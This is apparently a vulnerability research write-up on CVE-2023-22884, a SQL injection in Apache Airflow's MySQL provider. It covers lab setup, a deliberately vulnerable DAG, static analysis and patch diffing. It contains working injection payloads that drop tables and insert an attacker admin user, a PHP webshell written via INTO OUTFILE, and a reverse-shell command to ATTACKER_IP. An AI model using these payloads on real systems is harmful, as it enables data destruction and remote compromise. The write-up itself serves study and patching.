Summary
In this CVE analysis I investigate a critical security flaw in Apache Airflow, identified as **CVE-2023-22884**.
Introduction
In this CVE analysis, I investigate a critical security flaw in Apache Airflow, identified as CVE-2023-22884. The issue affects Apache Airflow before 2.5.1 and the Apache Airflow MySQL Provider before 4.0.0.
The official vulnerability description is a bit confusing:
"Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider."
Fortunately, Snyk makes this statement a bit more clear:
"Affected versions of this package are vulnerable to Command Injection due to lack of sanitization of input to the LOAD DATA LOCAL INFILE statement, which can be used by an attacker to execute commands on the operating system."
If you are not familiar with hacking, command injection is a type of attack that occurs when an attacker is able to manipulate command execution by injecting malicious code into an application. In the context of Apache Airflow, this vulnerability should let malicious users execute arbitrary commands on the underlying host. However, as we will see, this is not exactly the case.
Additionally, I came across another vulnerability type associated with the very same CVE: SQL injection.
The vulnerability received a near-maximum CVSS base score of 9.8:
So what is the flaw actually? Is it a command injection, an SQL injection, or an RCE? All of them? None of them?
In this analysis, our objective is to investigate the location of this vulnerability, understand its triggering mechanisms, identify the specific vulnerability type, and assess its impact on Airflow’s functionality.
About Airflow
Apache Airflow is a popular open-source platform for orchestrating complex data workflows that has emerged as a crucial tool in the data engineering and data science domains in the past few years.
You may ask how popular this software is, so here is some information about it:
- Over 8 million downloads and 20000 contributors. Over 300 companies, including Airbnb, Slack, Walmart, etc., use Airflow to run their data pipelines efficiently.[1]
- Used and popular in bigger companies: 64% of Airflow users work for companies with 200+ employees which is an 11 percent increase compared to 2020.[2]
- At the time this article was released, the package had more than 11 million downloads in the previous month on PyPI alone[3]
Lab Setup Prerequisites
Install Docker and Docker Compose
Follow these instructions:
- Docker: https://docs.docker.com/desktop/install/debian/
- Docker Compose: https://docs.docker.com/compose/install/linux/
MySQL
To get a MySQL 8 server I followed this writeup:
sudo apt update && sudo apt -y install wget
wget https://repo.mysql.com//mysql-apt-config_0.8.22-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.22-1_all.deb
sudo apt update
sudo apt install mysql-server
At the beginning of the research I read about the LOAD DATA INFILE SQL statement and found that, from a specific version on, this functionality has to be explicitly enabled by setting a variable. The config file on our host machine is located at /etc/mysql/my.cnf. Let's open it with our favorite editor and add this code to the bottom of the file:
[mysqld]
secure-file-priv = ""
With this variable, we can restrict the directories that can be used to load data into the MySQL database instance. The empty string means loading can happen from anywhere. Otherwise, we get the following error message:
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
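If you want to double-check the setting without opening a MySQL console, a quick Python sketch works too. This assumes the mysqlclient/MySQLdb package is installed (the same client library the Airflow MySQL provider uses); host and credentials are the lab values, so adjust them to your setup:

import MySQLdb

# Connect to the local MySQL server and read back the secure_file_priv variable.
conn = MySQLdb.connect(host="127.0.0.1", user="root", passwd="<your MySQL password>")
cur = conn.cursor()
cur.execute("SHOW VARIABLES LIKE 'secure_file_priv'")
print(cur.fetchone())  # expected after the config change: ('secure_file_priv', '')
conn.close()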
Let's confirm that MySQL 8.0 installed on Debian 11/10/9 is working as expected with
mysql -u root -p
After entering the password you should see your MySQL console:
Let’s create a table for testing purposes:
CREATE DATABASE airflow;
use airflow;
CREATE TABLE test (data varchar(255));
Install, configure, and run Airflow
This time we want to run Airflow in Docker with a local MySQL server we own.
I found a docker compose file that seems to work, but because the affected Airflow version ships with a newer MySQL provider package than the vulnerable one, we have to put a custom install command into a Dockerfile. You can find both files in this repo.
First, get the file:
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.5.0/docker-compose.yaml'
Then, uncomment the "build ." line in the docker-compose.yaml:
---
version: '3'
x-airflow-common:
  &airflow-common
  # In order to add custom dependencies or upgrade provider packages you can use your extended image.
  # Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
  # and uncomment the "build" line below, Then run `docker-compose build` to build the images.
  image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.5.0}
  build: . # UNCOMMENTED LINE HERE
  environment:
    &airflow-common-env
    AIRFLOW__CORE__EXECUTOR: CeleryExecutor
    AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
    # For backward compatibility, with Airflow <2.3
    AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
    AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
    AIRFLOW__CORE__FERNET_KEY: ''
    AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
    AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
    AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
    _PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
  volumes:
    - ./dags:/opt/airflow/dags
    - ./logs:/opt/airflow/logs
    - ./plugins:/opt/airflow/plugins
  user: "${AIRFLOW_UID:-50000}:0"
  depends_on:
    &airflow-common-depends-on
    redis:
      condition: service_healthy
    postgres:
      condition: service_healthy

[REDACTED]
Also add the install command to a Dockerfile located in the same folder as the docker-compose.yaml file.
FROM apache/airflow:2.5.0
RUN pip install apache-airflow-providers-mysql==3.4.0
Additionally, we have to initialize the Airflow environment. As the official tutorial says, "On Linux, the quick-start needs to know your host user id and needs to have group id set to 0. Otherwise, the files created in dags, logs and plugins will be created with root user ownership." So run the following commands:
mkdir -p ./dags ./logs ./plugins ./config
echo -e "AIRFLOW_UID=$(id -u)" > .env
Don't forget to initialize the database with docker compose up airflow-init.
Now build and run Airflow:
docker-compose up --build
As a result, you should see in the logs that the webserver and other components are up, and there is a login form at localhost:8080:
The default username and password is airflow.
As a final step here we can check whether the installation of the vulnerable provider version was successful or not with this one-liner:
docker exec -it `docker ps | grep webserver | cut -d " " -f1` bash -c "pip freeze | grep apache-airflow-providers-mysql"
The output should be apache-airflow-providers-mysql==3.4.0.
Reproducing the vulnerability
Add the MySQL connection
The vulnerability is related to a specific version of an Airflow provider that handles a MySQL connection, so this is a good starting point. We can add a connection with a specified provider under the Admin / Connections menu. Click on the "+" icon to do so.
Fill in the necessary data to connect to our local MySQL server:
- Connection Id: mysql
- Connection type: MySQL
- Host: your local machine's IP (you can check it with "hostname -I" or "ip a")
- Schema: airflow (this is the name of the database we created)
- Login: root (can be any other user based on your MySQL configuration)
- Password: the password to connect to the MySQL server
- Port: 3306 (this is the default MySQL port)
- Extra: {"local_infile": true} (this is an important part of the exploit)
Click on the "Test" button when you are ready. A "Connection successfully tested" message should pop up at the top of the page. Click on "Save".
Interestingly, it is possible by default to modify already defined connections in Airflow, so if a DAG is using one, you can make it vulnerable.
(See how I found the vulnerable code part in the “Static analysis” section but here we focus on the attack itself.)
Call the vulnerable method
There can be multiple scenarios to exploit this vulnerability. The most realistic one is that a common user can't add a custom DAG; otherwise, the impact is much smaller, since he/she could run any SQL command explicitly. But what if there is already a DAG we can tamper with? Additionally, modifying an existing connection is allowed by default in Airflow. So let's say we have a DAG that takes the file name given as an additional DAG parameter and calls the MySqlHook's vulnerable bulk_load method. This sounds like a scenario that can happen when somebody wants to load several files into a database from time to time.
Let’s say we have the following DAG already deployed. For the sake of simplicity, it contains the most necessary stuff only.
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python import get_current_context
from airflow.hooks.mysql_hook import MySqlHook


def get_file_name():
    """Get the user-supplied filename to load into the database from the context"""
    context = get_current_context()
    return context["params"].get("filename", "test_file")


def get_table_name():
    """Get the user-supplied table name"""
    context = get_current_context()
    return context["params"].get("table_name", "test_table")


def bulk_load_sql(**kwargs):
    """Call the hook's bulk_load method to load the file content into the database"""
    conn = MySqlHook(mysql_conn_id='mysql')
    get_filename = get_file_name()
    get_tablename = get_table_name()
    conn.bulk_load(table=get_tablename, tmp_file=get_filename)


"""Define the DAG"""
dag = DAG(
    "bulk_load_from_file",
    start_date=datetime(2023, 7, 1),
    schedule_interval=None)

"""Define the operator that calls the method to bulk load"""
t1 = PythonOperator(
    task_id='bulk_load',
    provide_context=True,
    python_callable=bulk_load_sql,
    dag=dag)

"""Call the operator"""
t1
In the get_file_name() function we extract a variable called "filename" from the parameters. Let's add the file as bulk_load.py to the dags folder to test it. As this folder was added as a volume, it will be picked up as a DAG by Airflow immediately.
Click on the "bulk_load_from_file" DAG and select the "Trigger DAG w/ config" option.
This page will bring up the configuration box, where you may set up your configuration in JSON format. Set the filename to "/tmp/test_file" with the payload {"filename":"/tmp/test_file"} just to see how it works.
Click on Trigger, then check the logs. You can get the logs of a DAG run by navigating to Graph / {name of the task in the DAG} / Log.
It says the following:
MySQLdb.OperationalError: (3948, 'Loading local data is disabled; this must be enabled on both the client and server sides')
After some googling, it turned out that we have to explicitly enable the local_infile variable in our local MySQL server with the command SET GLOBAL local_infile=1;.
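The same check (and, with sufficient privileges, the fix) can be scripted as well; a minimal sketch with MySQLdb, again using the lab credentials as placeholders:

import MySQLdb

conn = MySQLdb.connect(host="127.0.0.1", user="root", passwd="<your MySQL password>", db="airflow")
cur = conn.cursor()
# Check whether LOAD DATA LOCAL is allowed on the server side.
cur.execute("SHOW GLOBAL VARIABLES LIKE 'local_infile'")
print(cur.fetchone())  # e.g. ('local_infile', 'OFF') before enabling
# Enable it globally (requires a privileged account).
cur.execute("SET GLOBAL local_infile = 1")
conn.close()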
Load remote files into the database
Notice that LOAD DATA is somewhat "vulnerable by design": as you can read in MySQL's official documentation, it can load files located on both the server host and the client host. You may ask why and when this is used; the answer is that it is significantly faster than INSERT statements. To demonstrate this functionality, we will read a remote file and load it into our database. You can skip this section if you want, since it's not directly related to the vulnerability itself.
Let’s create a remote file on the worker’s machine that will actually be read by the DAG:
docker exec -it `docker ps | grep worker | cut -d " " -f1` bash -c "echo 'proof' > /tmp/test_file"
Delete everything from the test table:
Trigger a new DAG run with this config JSON:
{"filename":"/tmp/test_file","table_name":"test"}
Now there is no error message in the logs:
…aaand, see what we have in our database now:
So, this is the expected behavior with the expected inputs. However, we are hackers, so we are not interested in expected inputs and behaviors.
Performing the SQL injection
Our next task is to exploit the vulnerability itself.
Let's run this DAG with the following config JSON:
{"filename":"/tmp/test_file' INTO TABLE test; DROP TABLE test; --","table_name":"test"}
What SQL commands will run based on this payload if we substitute it into the original query? The original query is:
LOAD DATA LOCAL INFILE '{tmp_file}'
INTO TABLE {table}
The SQL code provided above is used to load data from a local file into a database table. Here's a brief breakdown of the code:
- LOAD DATA LOCAL INFILE: a MySQL-specific statement used to load data from a local file into a database table. It's used for bulk data import operations.
- '{tmp_file}': a placeholder for the path to the local file you want to load data from. The actual path of the file is substituted in place of '{tmp_file}'.
- INTO TABLE {table}: this part of the statement specifies the target database table where you want to load the data. {table} is replaced with the actual name of the table where the data should be inserted.
So the result will be (the part that is commented out is omitted):
LOAD DATA LOCAL INFILE '/tmp/test_file' INTO TABLE test;
DROP TABLE test; --
The DAG logs will show an error:
But when we check our table, we can see the test table has been deleted:
Oh yeah — SQLi is in da house!
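By the way, the UI is not even required to trigger the run: the same payload can be sent through Airflow's stable REST API, which makes scripting the attack trivial. A sketch (endpoint per the Airflow 2.x stable API; the default airflow/airflow credentials from this lab are assumed):

import requests

# Trigger a new run of the vulnerable DAG with the malicious configuration.
resp = requests.post(
    "http://localhost:8080/api/v1/dags/bulk_load_from_file/dagRuns",
    auth=("airflow", "airflow"),
    json={
        "conf": {
            "filename": "/tmp/test_file' INTO TABLE test; DROP TABLE test; --",
            "table_name": "test",
        }
    },
)
print(resp.status_code, resp.json())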
What else?
We dropped a table, right? It might sound quite annoying, but nowadays everyone has backups, and by doing this an attacker can easily draw attention to themselves. Let's delve into something more realistic. So how else can SQL injection be exploited?
In every database schema that also manages users, there's at least one dedicated table for this purpose. Suppose we have such a "users" table, structured as follows:
| user_id | username | email | first_name | last_name | password_hash | role |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | user123 | user123@example.com | John | Doe | hashed_pw_1 | user |
| 2 | alice | alice@example.com | Alice | Johnson | hashed_pw_2 | user |
| 3 | bob | bob@example.com | Bob | Smith | hashed_pw_3 | admin |
In the password_hash column, the hashed version of the user's password is stored. In real-world applications, a cryptographic hash function should be used for password hashing, such as bcrypt, SHA-256, or another strong hash algorithm. In this case, we are using SHA-256: the long string in the payload below is the hashed version of the password "s3cr3t".
Notice the "role" field as well. What if we could insert a new user with an "admin" role into the table, which we could then use to log into a platform as an admin? To achieve this, we would need to execute the following SQL command:
INSERT INTO users (username, email, first_name, last_name, password_hash, role)
VALUES ('attacker', 'attacker@vsociety.com', 'Mr.', 'V.', '482551228411e98ad8cb1f8b0a1443c9ffbafc10b630c7646c518ab19331ea7e2cf24ad383527da1071e2177af7e41b9e751c9c4fb2499aa22f69824f9657339', 'admin');
On the other hand, believe it or not, under certain circumstances it can even lead to Remote Code Execution (RCE), for instance if there is an opportunity to write files and the host running the SQL server also runs a web server like Apache. See the following command:
'[...] UNION SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE '/var/www/html/shell.php' #
The default root directory for Apache is '/var/www/html/'. Therefore, anything placed in this folder (like shell.php in this case) will be served. The provided PHP code is a simple webshell, meaning the command specified in the cmd parameter will run at the OS level through PHP's system() function. This is a common method in the case of file-write vulnerabilities on webservers. If, for example, a listener is started on the attacker's side and the above webshell is invoked with the appropriate command, a reverse shell can be obtained:
On the attacker’s machine:
nc -lvnp 4242
curl 'http://target-server/shell.php?cmd=bash%20-i%20%3E%26%20/dev/tcp/ATTACKER_IP/4242%200%3E%261'
The payload is the URL-encoded form of the "bash -i >& /dev/tcp/ATTACKER_IP/4242 0>&1" command. It's important to note that such actions are typically malicious, and using them without proper authorization is against the law. Always use your technical knowledge for ethical and legitimate purposes. Breaking down the command:
- bash -i: starts an interactive instance of the Bash shell on the target system.
- >& /dev/tcp/ATTACKER_IP/4242: redirects standard output and standard error to a TCP connection established to the specified IP address (ATTACKER_IP) and port (4242). Any output generated by the shell (such as command output) is sent to the attacker's machine over the network connection.
- 0>&1: redirects standard input (file descriptor 0) to the same network connection established in the previous step. This allows the attacker to send commands from their machine to the target system through the network connection.
However, with the current system I prepared as a PoC, I was unable to successfully execute this attack.
Static Analysis
The basic architecture of Airflow
Apache Airflow follows a distributed architecture that enables the orchestration and scheduling of complex data workflows. At its core, Airflow consists of several key components that work together to facilitate the efficient execution of tasks and manage dependencies. Let's see the most important terms to understand the architecture of Airflow and what these components are.
- Scheduler: The scheduler component is responsible for determining when and how tasks should be executed. It also submits tasks to the executor to run.
- Executor: Handles running tasks.
- Workers: responsible for executing tasks in a distributed manner. They pull tasks from the task queue and execute them on separate worker nodes, allowing for parallel execution and scalability.
- Task Dependencies: Airflow allows users to define dependencies between tasks using directed acyclic graphs (DAGs). This is the core concept of Airflow. Tasks can be chained together, allowing for complex workflows with conditional branching and parallelism. Tasks are triggered based on their dependencies and the success or failure of preceding tasks.
- Metadata database: Airflow utilizes a metadata database, such as MySQL or PostgreSQL, to store information used by the executor and scheduler about the workflow, tasks, and their dependencies.
- Webserver: Airflow provides a web-based user interface called the Airflow UI or the Airflow Webserver to inspect, trigger and debug the behavior of DAGs and tasks.
- Operators: Airflow provides a wide range of built-in operators that define the actions performed by tasks, such as executing a shell command, running a SQL query, or transferring files. Executors manage the execution of these operators, ensuring they are executed as specified and handling their results and states.
See the architectural schema on the official page:
By leveraging this architecture, Apache Airflow enables users to define, schedule, and monitor complex data workflows. Its distributed nature, coupled with the ability to define dependencies and utilize various executors, makes it a powerful tool for orchestrating data pipelines, ETL (Extract, Transform, Load) processes, and other data-driven tasks in a reliable and scalable manner.
The vulnerable snippet
Given the confusing description we saw in the Introduction section, it was not obvious where the vulnerability lies.
As a first step toward finding the vulnerable code, I compared the last vulnerable version (3.4.0) and the next, patched version (4.0.0) of the apache-airflow-providers-mysql package the description refers to. For this, I installed both and loaded them into a diff checker.
The change we are interested in affects mysql.py. (The vertica_to_mysql.py is related to an analytic database management software called Vertica.) See the differences below:
To summarize, in the vulnerable version the local_infile variable's value is extracted from the JSON the user submits in the "Extra" field. Its value will be False if it's not given:
local_infile = conn.extra_dejson.get("local_infile", False)
By the way, what is this local_infile? I found the following in the official Airflow docs:
So, not surprisingly, this is used for the LOAD DATA LOCAL INFILE capability the vulnerability is related to.
As a next step, I searched for the text "LOCAL INFILE" in mysql.py and found this method (you can also check it in the repo here):
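For reference, the bulk_load method looks roughly like this in the vulnerable 3.4.0 provider (a paraphrase consistent with the query shown earlier and the breakdown below; see the linked repo for the exact source):

def bulk_load(self, table: str, tmp_file: str) -> None:
    """Load a tab-delimited file into a database table."""
    conn = self.get_conn()
    cur = conn.cursor()
    # Both user-controlled values are interpolated straight into the SQL
    # statement via an f-string -- this is the injection point.
    cur.execute(
        f"""
        LOAD DATA LOCAL INFILE '{tmp_file}'
        INTO TABLE {table}
        """
    )
    conn.commit()
    conn.close()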
Notice that there is a similar function (bulk_dump) for dumping a database table into a file too. As its comment says, its purpose is to dump the contents of a specified database table into a tab-delimited file. (That method is arguably even more dangerous, but it is out of scope for now.)
Both methods take two parameters:
- table: a string with the name of the database table involved (the table the data is loaded into, or dumped from).
- tmp_file: a string with the path and filename of the tab-delimited file (the file the data is read from, or written to).
Breakdown of the code:
- conn = self.get_conn(): returns a database connection object.
- cur = conn.cursor(): creates a cursor object using the database connection. The cursor is used to execute SQL queries and interact with the database.
- cur.execute(...): executes an SQL query.
- conn.commit(): commits the transaction.
- conn.close(): closes the database connection, freeing up resources.
Maybe you have already noticed the security risk due to the lack of sanitization of the variables.
In Python, this query is built with an "f-string", also known as a formatted string literal. It is a way to create strings with expressions embedded within curly braces {}. When the string is defined with an 'f' prefix before the opening quotation mark, Python recognizes it as an f-string, and any expressions inside curly braces are evaluated and replaced with their corresponding values.
At this point, I realized that the vulnerability was a standard SQL injection. It was a quite liberating feeling.
For demonstration purposes, here is a simple Python script showing how a malicious input results in SQL injection:
tmp_file = '/etc/proof\' INTO TABLE test; DROP TABLE test; --'
table = 'test'
query = f"""LOAD DATA LOCAL INFILE '{tmp_file}' INTO TABLE {table}"""
print(query)
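Running this snippet prints the composed query, which now contains two statements plus a commented-out tail:

LOAD DATA LOCAL INFILE '/etc/proof' INTO TABLE test; DROP TABLE test; --' INTO TABLE test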
See that it contains two different SQL commands separated by a ";". Notice that the injected SQL command is "DROP TABLE test". As a general practice, the rest of the query is commented out with "--" in the payload to prevent errors during execution.
Now we have the injection point.
Debugging
In Apache Airflow, hooks are not automatically called when a connection is added or modified. Adding or modifying a connection in Airflow only updates the connection configuration in the Airflow metadata database. The connection information is then available for tasks to use when they are executed within a DAG. This fact reduces the severity of the vulnerability since we have to be authenticated to add or modify an existing MySQL connection, add a new DAG, or trigger an existing one with a code that fits our needs. However, never underestimate the power of SQLi. Sometimes it can be escalated even to an RCE.
Let’s set up a debugging environment.
Preparing the environment
Install PyCharm
Since Airflow has limited debugging capabilities, we install the latest version of PyCharm from the official download page. Let's put it under /opt/ for now. No installation is needed; it can be used as a standalone application.
Install Python3.8
We install Python 3.8 for this version of Airflow. I followed this tutorial.
Then I upgraded pip (because why not):
pip3.8 install --upgrade pip
Then activate a virtual environment in a working directory:
cd /opt
mkdir airflow && cd airflow
python3.8 -m venv airflow-2.5.0
cd airflow-2.5.0
chmod +x ./bin/activate
source bin/activate
Install Airflow and set up the environment
You can install Airflow 2.5.0 with this command:
pip3.8 install "apache-airflow==2.5.0" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.5.0/constraints-3.8.txt"
Add an admin user with this command (otherwise we would have to search for the credentials in the logs):
airflow users create --role Admin --username admin --email admin --firstname admin --lastname admin --password admin
Don’t forget to install the vulnerable MySQL provider:
pip3.8 install apache-airflow-providers-mysql==3.4.0
As a next step, place the vulnerable DAG into the /opt/airflow/airflow-2.5.0/lib/python3.8/site-packages/airflow/example_dags/ folder. You can find this DAG above and in this repo too. Or just download it to the correct location:
wget https://raw.githubusercontent.com/jakabakos/CVE-2023-22884-Airflow-SQLi/main/dags/bulk_load_from_file.py -P /opt/airflow/airflow-2.5.0/lib/python3.8/site-packages/airflow/example_dags/
Set up a debug environment
Now open PyCharm from the directory of the Airflow project.
Start with setting the proper interpreter. Click on the "Python" label in the bottom right corner of PyCharm and select "Add New Interpreter", then "Add Local Interpreter". Set "/opt/airflow/airflow-2.5.0/bin/python3.8" as the interpreter.
Our next task is to configure some project settings and the run and debug properties. Add a new run/debug configuration with the following settings:
The "Script path" should point to the main airflow script. Notice the standalone parameter, which runs all the Airflow components at once (triggerer, scheduler, webserver).
Then, search for airflow/providers/mysql/hooks/mysql.py and set up some breakpoints:
(If you are not familiar with PyCharm: you can set a new breakpoint by clicking where the red dots are shown.)
Now we have everything to run our Airflow instance from Pycharm. Click on the Debug icon in the top right corner:
You should see everything is OK in the logs in the Pycharm console.
Open a browser and navigate to localhost:8080.
Log in with "admin" and "admin".
Set up a connection for testing purposes under the Admin / Connections menu.
Fill in the necessary data to connect to our local MySQL server:
- Connection Id: mysql
- Connection type: MySQL
- Host: localhost
- Schema: airflow
- Login: root (can be any other user based on your MySQL configuration)
- Password: the password to connect to the MySQL server
- Port: 3306
- Extra: {"local_infile": true}
Click on the "Test" button when you are ready. First, I got this error message:
libmariadb.so.3: cannot open shared object file: No such file or directory
But this command solved the issue:
sudo apt-get install -y libmariadb-dev
If everything is OK, then a "Connection successfully tested" message should pop up at the top of the page. Click on "Save".
Lastly, unpause the "bulk_load_from_file" DAG in the list.
Running the DAG
Let’s run our DAG with a normal config, and click on “Trigger”.
You can use for example this payload:
{"filename":"/tmp/test_file","table_name":"test"}
But when the DAG is triggered, nothing happens in PyCharm: the breakpoints are not hit.
The problem is that the different Airflow components run as subprocesses; there is a known issue with this, so the components would have to be run separately.
I also tried running only one component from PyCharm and the other two from the terminal, but the breakpoints were still not hit. Because of the simplicity of this bug, I decided to stop here, since the core of the bug, Python's f-string interpolation, was already shown in the static analysis part.
Patch diffing
The commit of the related patch says the following:
“Move local_infile option from extra to hook parameter
This change is to move local_infile parameter from connection extra to Hook. Since this feature is only used for very specific cases, it belongs to the "action" it executes, not to the connection defined in general. For example in Hive and Vertica transfers, the capability of local_infile is simply enabled by the bulk_load parameter - and it allows to use the same connection in both cases."
You can also check it in the related pull request in the official Airflow repo.
The changelog phrases the same issue in a tiny bit more detail from the technical point of view:
“You can no longer pass “local_infile” as extra in the connection. You should pass it instead as hook’s “local_infile” parameter when you create the MySqlHook (either directly or via hook_params).”
The docs have also changed, since the related part had to be deleted:
In the fixed version, local_infile can no longer be submitted as a connection extra parameter; the parameter moved from the connection extra to the hook:
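To illustrate the new usage described in the changelog quoted above (a sketch of the patched API, not the actual diff):

from airflow.providers.mysql.hooks.mysql import MySqlHook

# Provider >= 4.0.0: local_infile is a parameter of the hook itself,
# not something read from the connection's "Extra" JSON.
hook = MySqlHook(mysql_conn_id="mysql", local_infile=True)
hook.bulk_load(table="test", tmp_file="/tmp/test_file")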
Mitigation
The mitigation is simple:
- Update Airflow to version 2.5.1 or later, and
- update the Apache Airflow MySQL Provider to version 4.0.0 or later.
Final thoughts
The Apache Airflow SQL injection vulnerability presented a significant challenge in identifying the exact source of the vulnerability due to the confusing and convoluted nature of the initial description. The complex web of dependencies and interactions within such a commonly used software architecture made it even more difficult to pinpoint the specific weakness.
Despite the initial hurdles, the process of investigating and unraveling the intricacies of the vulnerability was an enjoyable and intellectually stimulating experience. As an intricate and widely adopted workflow automation platform, Apache Airflow demanded a deep understanding of its inner workings and interactions with various components.
The effort invested in dissecting and comprehending this complex system not only led to the discovery and resolution of the SQL injection vulnerability but also provided valuable insights into enhancing overall system security and best practices. This undertaking underscored the importance of continuous vigilance in the realm of cybersecurity, especially when dealing with widely-used tools like Apache Airflow.
Resources
[1] https://www.projectpro.io/article/what-is-apache-airflow-used-for/616
[2] https://airflow.apache.org/blog/airflow-survey-2022/
[3] https://pypistats.org/packages/apache-airflow
https://airflow.apache.org/docs
Join vsociety: https://vsociety.io/
Check out our Discord: https://discord.gg/sHJtMteYHQ